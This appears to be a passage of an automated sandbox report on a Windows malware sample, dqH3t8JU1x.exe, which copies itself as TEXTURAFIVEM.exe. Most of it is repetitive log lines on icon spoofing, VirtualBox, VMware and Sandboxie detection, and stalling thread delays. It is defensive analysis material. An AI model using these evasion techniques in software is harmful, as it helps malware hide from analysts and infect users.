            Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (1501).png
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00404E10 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00404E10
            Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Contain functionality to detect virtual machinesShow sources
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: VBoxService.exe VBoxService.exe 1_2_004051CC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: VBoxService.exe VBoxService.exe 4_2_004051CC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: VBoxService.exe VBoxService.exe 5_2_004051CC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: VBoxService.exe VBoxService.exe 9_2_004051CC
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: dqH3t8JU1x.exe, 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmpBinary or memory string: SBIEDLL.DLLS3
            Source: TEXTURAFIVEM.exe, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\SysWOW64\explorer.exeCode function: OpenSCManagerA,EnumServicesStatusA,CloseServiceHandle,20_2_2403C9E0
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 1800000Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 1800000Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 955Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: foregroundWindowGot 1347Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: foregroundWindowGot 449Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5208Thread sleep time: -39600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5348Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2880Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6380Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2276Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6120Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6116Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6272Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6268Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6364Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6112Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6548Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5796Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5208Thread sleep time: -1800000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6052Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6808Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4680Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6400Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6656Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6252Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6644Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6660Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6480Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4668Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5132Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 1684Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5548Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6248Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6504Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6524Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5464Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5420Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2968Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4696Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6016Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5472Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 1208Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6620Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 724Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5980Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4996Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3400Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6340Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4840Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 400Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5684Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 600Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2320Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6640Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4280Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6772Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6604Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4708Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6924Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3324Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 7124Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4780Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 7152Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3976Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3000Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6956Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5784Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3036Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5556Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6556Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3912Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 5664Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00405D04 FindFirstFileA,FindClose,1_2_00405D04
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_00405D04 FindFirstFileA,FindClose,4_2_00405D04
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_00405D04 FindFirstFileA,FindClose,5_2_00405D04
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_00405D04 FindFirstFileA,FindClose,9_2_00405D04
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24016C78 FindFirstFileA,FindClose,20_2_24016C78
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_240145F0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,20_2_240145F0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403D390 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,20_2_2403D390
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_240163E8 FindFirstFileA,GetLastError,20_2_240163E8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24016C77 FindFirstFileA,FindClose,20_2_24016C77
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24015FE2 FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,20_2_24015FE2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24015FE4 FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,20_2_24015FE4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_240409E4 FindFirstFileA,FindNextFileA,FindClose,20_2_240409E4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2404092C GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,20_2_2404092C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2401F870 GetVersionExW,GetVersionExW,GetSystemInfo,GetSystemMetrics,20_2_2401F870
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 1800000Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 1800000Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
